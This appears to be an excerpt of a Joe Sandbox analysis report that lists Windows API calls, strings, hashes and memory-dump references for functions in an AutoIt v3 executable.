                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7f6ac570d2021c5f0a1e5f69b6722f2074aef0cd6ec7bad594238bb549ccb590
                                                                                                                                                                                                                                                                                        • Instruction ID: 3a6d95d05c4dd88932d552a806c4494f06de4bab4e0a09f2714e342d79ee3e90
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f6ac570d2021c5f0a1e5f69b6722f2074aef0cd6ec7bad594238bb549ccb590
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F93182725083019FD310EF64CC85AAFBBE8EF99350F54092DF581871A1DB729945FB92
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetInputState.USER32 ref: 00F0EF07
                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 00F0F107
                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F0F228
                                                                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00F0F27B
                                                                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00F0F289
                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F0F29F
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00F0F2B1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cada4ff6c47fabac8f531965992424435ff58d83f4cb474691d39769d84942e9
                                                                                                                                                                                                                                                                                        • Instruction ID: e4bca42e646a9df172c0ed697fc178a16bffcb5d8ac2e5b6ca6733e58fa4d65f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cada4ff6c47fabac8f531965992424435ff58d83f4cb474691d39769d84942e9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF32E031A08606EFD738CF24C844B6AB7E5BF81315F14852AEA55876D1C775E88CFB82

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F03657
                                                                                                                                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00F03681
                                                                                                                                                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F03692
                                                                                                                                                                                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00F036AF
                                                                                                                                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F036BF
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00F036D5
                                                                                                                                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F036E4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                        • Opcode ID: ffeeb8851a471d3fb97c4df282cbcaa31267a2664cbb61c76fa473a09fe0011e
                                                                                                                                                                                                                                                                                        • Instruction ID: 297326dcd29d278aa47b3c4c16c6fe9f99a8c56f1f18f4a75b68c590597b1025
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffeeb8851a471d3fb97c4df282cbcaa31267a2664cbb61c76fa473a09fe0011e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F621C3B5D0221CAFDB40DFE4E889A9DBBB5FB18710F10411BF611A62A0D7B54544AF92

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F4071A: CreateFileW.KERNEL32(00000000,00000000,?,00F40A84,?,?,00000000,?,00F40A84,00000000,0000000C), ref: 00F40737
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F40AEF
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F40AF6
                                                                                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00F40B02
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F40B0C
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F40B15
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F40B35
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F40C7F
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F40CB1
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F40CB8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                                                        • API String ID: 4237864984-2852464175

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F05594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00F44B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00F055B2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F05238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F0525A
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F053C4
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F44BFD
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F44C3E
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F44C80
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F44CE7
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F44CF6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                        • API String ID: 98802146-2727554177

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F034DE
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F034ED
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00F03503
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00F03515
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00F03527
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F0353F
                                                                                                                                                                                                                                                                                        • RegisterClassExW.USER32(?), ref: 00F03590
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: GetSysColorBrush.USER32(0000000F), ref: 00F03657
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: RegisterClassExW.USER32(00000030), ref: 00F03681
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F03692
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: InitCommonControlsEx.COMCTL32(?), ref: 00F036AF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F036BF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: LoadIconW.USER32(000000A9), ref: 00F036D5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F036E4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                        • API String ID: 423443420-4155596026

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 00F81019
                                                                                                                                                                                                                                                                                        • inet_addr.WSOCK32(?), ref: 00F81079
                                                                                                                                                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 00F81085
                                                                                                                                                                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00F81093
                                                                                                                                                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F81123
                                                                                                                                                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F81142
                                                                                                                                                                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00F81216
                                                                                                                                                                                                                                                                                        • WSACleanup.WSOCK32 ref: 00F8121C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                        • String ID: Ping
                                                                                                                                                                                                                                                                                        • API String ID: 1028309954-2246546115

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F03709,?,?), ref: 00F03777
                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,00F03709,?,?), ref: 00F037A3
                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F037C6
                                                                                                                                                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F03709,?,?), ref: 00F037D1
                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00F037E5
                                                                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00F03806
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                        • API String ID: 129472671-2362178303

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                        • API String ID: 0-4285391669

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        control_flow_graph 1001 f035b3-f03623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F035E1
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03602
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F03368,?), ref: 00F03616
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F03368,?), ref: 00F0361F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                        • API String ID: 1584632944-3779509399

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        control_flow_graph 1002 f0663e-f06654 LoadLibraryA 1003 f06674-f06678 1002->1003 1004 f06656-f06664 GetProcAddress 1002->1004 1005 f06666 1004->1005 1006 f06669-f0666b 1004->1006 1005->1006 1006->1003 1007 f0666d-f0666e FreeLibrary 1006->1007 1007->1003
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F0668B,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F0664A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F0665C
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00F0668B,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F0666E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-3689287502

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F45287
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F06299
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                        • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                        • API String ID: 2289894680-4094128768

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F058BE,SwapMouseButtons,00000004,?), ref: 00F058EF
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F058BE,SwapMouseButtons,00000004,?), ref: 00F05910
                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00F058BE,SwapMouseButtons,00000004,?), ref: 00F05932
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Variable must be of type 'Object'., xrefs: 00F548C6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                                        • API String ID: 0-109567571
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00F115F2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00F209D8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F23614: RaiseException.KERNEL32(?,?,?,00F209FA,?,00000000,?,?,?,?,?,?,00F209FA,00000000,00FC9758,00000000), ref: 00F23674
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00F209F5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                        • String ID: Unknown exception
                                                                                                                                                                                                                                                                                        • API String ID: 3476068407-410509341
